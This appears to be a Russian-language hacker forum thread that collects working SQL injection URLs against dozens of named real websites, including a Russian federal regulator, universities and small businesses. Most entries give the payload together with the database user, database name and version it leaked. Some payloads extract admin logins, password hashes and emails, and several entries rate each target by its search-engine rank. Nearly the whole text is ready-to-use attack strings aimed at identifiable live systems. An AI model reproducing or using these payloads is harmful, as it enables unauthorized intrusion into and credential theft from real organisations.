SQL Инъекции

Code:

http://www.syriacorthodox-mlb.org/news.php?id=-793+union+select+1,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,3,4,5,6--

asmarpr1_syriac@localhost : asmarpr1_syriac : 5.1.66-cll

 

gosnadzor.ru Федеральная служба по экологическому, технологическому и атомному надзору России

PHP:

http://szap.gosnadzor.ru/news/terrnews.html?id=828+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

Яндекс тИЦ (CY) 3500
Google PageRank (PR) 6
5.1.66

 

Code:

http://www.belifrost.com/p roducts.php?id=-1 4+u nion+sel ect+1, C ONCAT_WS%28C HA R%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7, 8--

asmarpr1_belif@localhost : asmarpr1_belifrost : 5.1.66-cll

 

http://www.windward-islands.net/crewed/yacht-us.php?ID=-254+union+select+1,2,3,login,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+Admin+limit+0,1--+
PR:4
ТИЦ:10

 

Code:

http://www.360.is/index.php?pid=261&cid=-2141+union+select+1,2,3,4,5,6,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,datab ase%28 %29,versi on%28%29%29,8,9,10, 1 1,12,13,14--

 

Code:

http://www.stock-software.com/news/subcategory.php?subcatid=186+and+1=2+union+select+1,user%28%29,3,4+--+

http://www.wholesalewigs.net/ViewItem.php?ItemID=219%27+and+1=2+UNION%20SELECT%201,2,3,4,5,user%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+&subbrand=20&brandname=Revlon&brandid=16&brandtype=1&source=index.php

 

Code:

h ttp: //www.firstgulf .com/search-d etails.ph p?id=-23+un ion+select+1,ve rsion(),u ser(),4,da tabase(),6,7,8,9,10,11--

 

Code:

 
http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15+--+
http://www.dialysisunits.com/unit.php?id=-12552+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+--+
http://landscrona.ru/media/index.php?id=-3594+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15+--+
http://www.pcidatabase.com/vendor_details.php?id=-606+union+select+1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15+--+

 

Платная модульная cms. Множественные уязвимости. До исходников добраться не получилось для полноценного репорта, поэтому только самое критичное(хотя и не особенно ее покупают, судя по всему ).

sql-inj в каком-то из скриптов сбора статистики.

Request Headers:

Host:www.jcms.ru
X-Forwarded-For: 127.0.0.1')on duplicate key update h=(select 1 from(select count(*),concat((select(select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)h)#


Response Content:

<h1>Software error:</h1>
<pre>DBD::mysql::st execute failed: Duplicate entry '5.0.901' for key 1 at /MySQL.cgi line 12.
</pre>


sql-inj в демо-админке:

PHP:

http://demo.jcms.ru/cgi-bin/admin.cgi?login=demo&password=demo&action=photogallery_photogallery_edit&JCMSPhotoGalleryAlbumId=-3' union select 1,version(),3,4,5,6,7,8,9,10+--+h

Главная админка http://jcms.ru/cgi-bin/admin.cgi

Разработчик уведомлён, реакции не последовало.

 

подыскивая себе водный транспорт, наткнулся на это...
http://www.wellboat-spb.ru/caters.php?id=-20%20and%201=2%20union%20select%201,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20--

5.0.77-log wellboat_spb@localhost wellboat_spb pc-linux-gnu

 

http://www.asra.com/e-news.php?id=-2+union+select+1,@@version,3,4,5,user()+--+ //root
http://www.casatuscany.com/about/page.php?id=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+ //4.1
http://www.bbkingblues.com/bio.php?id=-2388+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+--+ //4.1
http://www.carkitinc.com/carkit2.php?id=-12+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17+--+

 

http://www.i-teco.ru/news-arh.php?id=999999.9' union all select (select concat(0x27,0x7e,unhex(Hex(cast(wpb_users.user_login as char))),0x5e,unhex(Hex(cast(wpb_users.user_pass as char))),0x5e,unhex(Hex(cast(wpb_users.user_email as char))),0x5e,unhex(Hex(cast(wpb_users.user_nicename as char))),0x27,0x7e) from `structure_i`.wpb_users limit 0,1) ,0x31303235343830303536,0x31303235343830303536-- a

http://brown.edu/scs/undergrad/catalog/course.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(version() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

// 2 поста подряд с разницей в пару часов
// Я за тебя объединять должен ?

// BigBear

извиняй

 

http://www.ku.edu/ - The University of Kansas

Яндекс тИЦ (CY): 350
Google PageRank (PR): 7

boolean-based blind

Code:

http://www.ku.edu/academics/?school=1')+and+1=1+and+(''='
http://www.ku.edu/academics/?school=1')+RLIKE+IF(1=1,0x4d7953514c,0x28)+and+('1'='1

web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 4.1.13-standard

 

Яндекс тИЦ (CY) 550
Google PageRank (PR) 6

http://www.world-history.ru/persons_about.phtml?Id_article=999999.9 union all select (select concat(0x27,0x7e,unhex(Hex(cast(users.login as char))),0x5e,unhex(Hex(cast(users.password as char))),0x27,0x7e) from `history`.users limit 1,1) --

 

На сайте присутствует WAF и 3-5к трафика

Code:

http://www.lingvotech.com/index.php?section=docs&page=1&id_refer=6356%0dand(extractvalue(1,concat(0x3a,(select+/*!table_name*/+from+information_schema.`tables`+/*!where*/+table_schema=0x617634395f6c696e67766f+limit+0,1))))#

Version: 5.1.66-cll
Database: av49_lingvo
User: av49_lingvo@localhost

CY - 160
PR - 0

 

Скуля: http://www.numismat-invest.ru/aukcion.php?id=0'+union+select+1,2,3,4,5,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e),7,8/*
version: 5.0.45-community-nt-log
user: [email protected]
database: 1gb_niko
GooglePR: 1
YandexCY: 10


Скуля: http://www.mmc-rspp.ru/bistubiseng.php?id=0'+union+select+1,2,3,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e),5,6,7+--+
version: 5.1.65
user: admin_mmtrours@localhost
database: admin_cmsmmcrspp
GooglePR: 3
YandexCY: 50


Скуля: http://filerootspeed.ru/post.php?id=0'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e),16,17+--+
version: 5.1.66-cll
user: exarh758_dor1@localhost
database: exarh758_filerootspeed
GooglePR: 0
YandexCY: 0

Скуля: http://www.blenheims.co.uk/leaseholdersandresidents/details.php?id=0+union+select+1,2,3,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e)
version: 5.1.66-cll
user: groupbh_user@localhost
GooglePR: 1
YandexCY: 0

 

Яндекс тИЦ (CY) - 2000
Google PageRank (PR) - 6

http://bards.ru/' or 1=convert(int,@@version) and '1'='1

http://bards.ru/' or 1=convert(int,(char(126)+(select distinct top 1 table_name from (select distinct top 77 table_name from information_schema.tables order BY table_name ASC) sq order BY table_name DESC)+char(126))) and '1'='1

 

Code:

http://mercerproducts.com.au/details.php?id=-23+union+select+1,version(),3,4,5--

PHP/5.2.13-0.dotdeb.0
5.0.51a-24+lenny5
adzmer043@localhost
richardhayes

 

Скуля: http://www.satcommobil.com/rentals.php?id=0+union+select+1,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e),3,4,5,6
version: 4.1.24-log
user: [email protected]
database: satcommobil
Домен: www.satcommobil.com
GooglePR: 0
YandexCY: 0


Скуля: http://telefon.sputnik-video.ru/index.php?id=0+union+select+1,2,3,4,5,6,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+
version: 5.0.96-community-log
user: sputnik@localhost
database: sputnik_test
Домен: telefon.sputnik-video.ru
GooglePR: 2
YandexCY: 0




Скуля: http://ausasustainingmembers.searchablelisting.com/viewDetails.php?id=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e),17,18
version: 5.0.96-log
user: [email protected]
database: db448644008
Домен: ausasustainingmembers.searchablelisting.com
GooglePR: 4
YandexCY: 0


Скуля: http://www.experiencedevelopment.org/news_stories_detail.php?id=0+union+select+1,2,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e),4
version: 5.0.77
user: expdev@localhost
database: experiencedevelopment
Домен: www.experiencedevelopment.org
GooglePR: 5
YandexCY: 0


Скуля: http://www.jpscu.com/page.php?id=0'+union+select+1,concat(0x7e,version(),0x7c,user(),0x7c,database(),0x7e),3/*
version: 4.1.22
user: jpscocu@localhost
database: jpscu
Домен: www.jpscu.com
GooglePR: 1
YandexCY: 0

// СГЕНЕРИРОВАНО МОДЕРАТОРОМ BigBear
// У меня терпение не железное...

 

Code:

http://www .uls.or .ug/details.php?load=uls&id=-23+uni on+select+1,2,3,4,5,version(),7,user(),9,10,11,12,13,14,15,16,database()--

5.1.66-cll
law2012_koleman
law2012_sindtalo@localhost